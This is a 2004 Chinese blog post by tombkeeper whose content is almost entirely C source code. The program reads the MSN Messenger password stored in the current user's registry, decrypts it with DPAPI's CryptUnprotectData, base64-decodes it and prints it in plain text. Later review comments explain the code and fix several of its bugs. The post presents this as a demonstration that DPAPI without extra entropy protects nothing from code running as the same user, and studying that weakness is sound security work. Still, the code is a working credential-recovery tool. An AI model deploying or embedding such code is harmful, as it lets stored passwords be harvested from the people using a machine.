从注册表中还原MSNMessenger口令

原创 2004年09月13日 15:08:00


演示从注册表中还原MSNMessenger口令


作者:tombkeeper (t0mbkeeper_at_hotmail.com)

/* MSNMessenger的口令是经过DPAPI加密后保存在注册表中的
* 这个程序演示解码过程
* tombkeeper[0x40]nsfocus[0x2e]com
* tombkeeper[0x40]xfocus[0x2e]net
* 2004.08.11
*/

#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <Windows.h>


#pragma comment(lib, "Advapi32.lib")

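/*
 * FCHK(expr): evaluate expr once; if it is false, print "<expr> failed" and
 * return 0 from the enclosing function (so it is only usable inside functions
 * that return an integer).
 *
 * Wrapped in do { } while (0) so that "FCHK(x);" is a single statement and
 * stays correct inside an unbraced if/else.  The message ends in a real
 * newline escape; the listing as published shows "/n", which prints the two
 * characters '/' and 'n' instead of a line break.
 */
#define FCHK(a)     do { if (!(a)) { printf(#a " failed\n"); return 0; } } while (0)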

/*
 * Local copies of the declarations needed to call CryptUnprotectData through
 * a function pointer resolved at run time (main loads Crypt32.dll and looks
 * the export up with GetProcAddress).
 *
 * NOTE(review): current Windows SDK headers already declare DATA_BLOB,
 * CRYPTPROTECT_PROMPTSTRUCT and CryptUnprotectData, so these local
 * definitions may collide with <Windows.h> on a modern toolchain; confirm
 * against the SDK in use.
 */

/* Length-prefixed byte buffer: cbData is the byte count, pbData the bytes. */
typedef struct _CRYPTOAPI_BLOB {
    DWORD cbData;
    BYTE* pbData;
} DATA_BLOB;

/* Prompt description accepted by CryptUnprotectData; main passes NULL for it. */
typedef struct _CRYPTPROTECT_PROMPTSTRUCT {
    DWORD cbSize;
    DWORD dwPromptFlags;
    HWND hwndApp;
    LPCWSTR szPrompt;
} CRYPTPROTECT_PROMPTSTRUCT, *PCRYPTPROTECT_PROMPTSTRUCT;

/* Pointer type matching the signature of the CryptUnprotectData export. */
typedef BOOL (WINAPI *PCryptUnprotectData)(
    DATA_BLOB* pDataIn,
    LPWSTR* ppszDataDescr,
    DATA_BLOB* pOptionalEntropy,
    PVOID pvReserved,
    CRYPTPROTECT_PROMPTSTRUCT* pPromptStruct,
    DWORD dwFlags,
    DATA_BLOB* pDataOut
);

/* Filled in by main via GetProcAddress; NULL until then. */
PCryptUnprotectData CryptUnprotectData = NULL;


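/*
 * Demonstrates that the MSN Messenger password stored under the current
 * user's registry hive can be decoded by any program running as that user.
 *
 * The value is protected with DPAPI and no optional entropy, so the only
 * "secret" is the logged-on user's own credentials: the protection holds
 * against other accounts and offline copies of the hive, not against code
 * executing in the user's session.  Applications that rely on DPAPI alone
 * should be assessed with that boundary in mind.
 *
 * Returns 0 when the password was decoded and printed, 1 on any failure.
 */
int main(void)
{
    /* base64_decode is defined after main in this file; declare it here so
     * the call below is not an implicit declaration. */
    int base64_decode (char const *src, char *target, size_t targsize);

    int       rc = 1;                   /* exit code; 0 only on full success */
    LONG      ret;
    HMODULE   hCrypt32 = NULL;
    HKEY      hKey = NULL;
    DWORD     dwType = 0;
    BYTE      Data[0x100] = {0};        /* raw registry value */
    DWORD     dwSize = sizeof (Data);   /* in: buffer size, out: bytes read */
    DATA_BLOB DataIn;
    DATA_BLOB DataOut = {0, NULL};
    char      Encoded[0x100] = {0};     /* NUL-terminated copy of DPAPI output */
    char      Plain[0x100] = {0};       /* base64-decoded result */
    int       len;

    /* The ANSI entry points are named explicitly because every string here
     * is a narrow literal; the generic macros would break under UNICODE. */
    ret = RegOpenKeyExA
    (
        HKEY_CURRENT_USER,
        "Software\\Microsoft\\MSNMessenger",
        0,
        KEY_READ,
        &hKey
    );
    if (ret != ERROR_SUCCESS)
        return 1;

    /* dwSize must carry the buffer size on input; left uninitialised the
     * call could fail or write past the end of Data. */
    ret = RegQueryValueExA
    (
        hKey,
        "Password.NET Messenger Service",
        NULL,
        &dwType,
        Data,
        &dwSize
    );
    RegCloseKey (hKey);
    if (ret != ERROR_SUCCESS)
        return 1;

    /* Two leading bytes are skipped below, so anything shorter is unusable
     * and dwSize - 2 would wrap around. */
    if (dwSize <= 2)
    {
        printf ("stored value too short\n");
        return 1;
    }

    hCrypt32 = LoadLibraryA ("Crypt32.dll");
    if (hCrypt32 == NULL)
    {
        printf ("LoadLibrary (\"Crypt32.dll\") failed\n");
        return 1;
    }

    CryptUnprotectData = (PCryptUnprotectData)
        GetProcAddress (hCrypt32, "CryptUnprotectData");
    if (CryptUnprotectData == NULL)
    {
        printf ("GetProcAddress (\"CryptUnprotectData\") failed\n");
        goto out;
    }

    /* Per the original author, the password ciphertext starts at offset 2. */
    DataIn.pbData = Data + 2;
    DataIn.cbData = dwSize - 2;

    /* dwFlags 1 is CRYPTPROTECT_UI_FORBIDDEN: fail instead of prompting. */
    if (!CryptUnprotectData (&DataIn, NULL, NULL, NULL, NULL, 1, &DataOut))
    {
        printf ("CryptUnprotectData failed\n");
        goto out;
    }

    /* The decrypted blob is a counted buffer, not a C string: copy it with
     * its length and terminate it before handing it to base64_decode. */
    if (DataOut.pbData == NULL || DataOut.cbData >= sizeof (Encoded))
    {
        printf ("decrypted data has unexpected size\n");
        goto out;
    }
    memcpy (Encoded, DataOut.pbData, DataOut.cbData);
    Encoded[DataOut.cbData] = '\0';

    /* targsize is the capacity of the destination (one byte is reserved for
     * the terminator), not the length of the source text. */
    len = base64_decode (Encoded, Plain, sizeof (Plain) - 1);
    if (len < 0)
    {
        printf ("base64_decode failed\n");
        goto out;
    }
    Plain[len] = '\0';

    printf ("MSN Password: %s\n", Plain);
    rc = 0;

out:
    /* Do not leave the recovered secret behind in process memory. */
    SecureZeroMemory (Plain, sizeof (Plain));
    SecureZeroMemory (Encoded, sizeof (Encoded));
    if (DataOut.pbData != NULL)
    {
        SecureZeroMemory (DataOut.pbData, DataOut.cbData);
        LocalFree (DataOut.pbData);     /* output blob is owned by the caller */
    }
    CryptUnprotectData = NULL;          /* pointer is invalid once the DLL is released */
    FreeLibrary (hCrypt32);
    return rc;
}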

//copied from GNU libc - libc/resolv/base64.c
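/*
 * Decode NUL-terminated base64 text.
 *
 * src      - base64 input; whitespace is skipped anywhere.
 * target   - destination buffer, or NULL to validate the input and count the
 *            decoded bytes without storing them.
 * targsize - capacity of target in bytes (ignored when target is NULL).
 *
 * Returns the number of decoded bytes, or -1 if the input contains a
 * non-base64 character, is badly padded, has non-zero leftover bits, or does
 * not fit in target.  The output is NOT NUL-terminated.
 *
 * The end-of-string tests compare against '\0'.  The listing as published
 * shows '/0', a multi-character constant that never equals a byte read from
 * src, so the loops would run past the end of the input.
 */
int base64_decode (char const *src, char *target, size_t targsize)
{
    static const char Base64[] =
        "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    static const char Pad64 = '=';

    int tarindex, state, ch;
    char *pos;

    state = 0;      /* position inside the current 4-character group */
    tarindex = 0;   /* index of the output byte being assembled */

    while ((ch = *src++) != '\0')
    {
        /* Cast first: passing a negative char value to isspace is undefined. */
        if (isspace ((unsigned char) ch))   /* Skip whitespace anywhere. */
            continue;

        if (ch == Pad64)
            break;

        pos = strchr (Base64, ch);
        if (pos == NULL)                    /* A non-base64 character. */
            return (-1);

        switch (state)
        {
            case 0:
                if (target)
                {
                    if ((size_t) tarindex >= targsize)
                        return (-1);
                    target[tarindex] = (pos - Base64) << 2;
                }
                state = 1;
                break;
            case 1:
                if (target)
                {
                    /* Two bytes are touched here, hence the +1 bound. */
                    if ((size_t) tarindex + 1 >= targsize)
                        return (-1);
                    target[tarindex] |= (pos - Base64) >> 4;
                    target[tarindex + 1] = ((pos - Base64) & 0x0f) << 4;
                }
                tarindex++;
                state = 2;
                break;
            case 2:
                if (target)
                {
                    if ((size_t) tarindex + 1 >= targsize)
                        return (-1);
                    target[tarindex] |= (pos - Base64) >> 2;
                    target[tarindex + 1] = ((pos - Base64) & 0x03) << 6;
                }
                tarindex++;
                state = 3;
                break;
            case 3:
                if (target)
                {
                    if ((size_t) tarindex >= targsize)
                        return (-1);
                    target[tarindex] |= (pos - Base64);
                }
                tarindex++;
                state = 0;
                break;
            default:
                abort ();
        }
    }

    /*
     * We are done decoding Base-64 chars.  Let's see if we ended
     * on a byte boundary, and/or with erroneous trailing characters.
     */

    if (ch == Pad64)
    {                               /* We got a pad char. */
        ch = *src++;                /* Skip it, get next. */
        switch (state)
        {
            case 0:         /* Invalid = in first position */
            case 1:         /* Invalid = in second position */
                return (-1);

            case 2:         /* Valid, means one byte of info */
                /* Skip any number of spaces. */
                for (; ch != '\0'; ch = *src++)
                    if (!isspace ((unsigned char) ch))
                        break;
                /* Make sure there is another trailing = sign. */
                if (ch != Pad64)
                    return (-1);
                ch = *src++;        /* Skip the = */
                /* Fall through to "single trailing =" case. */
                /* FALLTHROUGH */

            case 3:         /* Valid, means two bytes of info */
                /*
                 * We know this char is an =.  Is there anything but
                 * whitespace after it?
                 */
                for (; ch != '\0'; ch = *src++)
                    if (!isspace ((unsigned char) ch))
                        return (-1);

                /*
                 * Now make sure for cases 2 and 3 that the "extra"
                 * bits that slopped past the last full byte were
                 * zeros.  If we don't check them, they become a
                 * subliminal channel.
                 */
                if (target && target[tarindex] != 0)
                    return (-1);
        }
    }
    else
    {
        /*
         * We ended by seeing the end of the string.  Make sure we
         * have no partial bytes lying around.
         */
        if (state != 0)
            return (-1);
    }

    return (tarindex);
}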
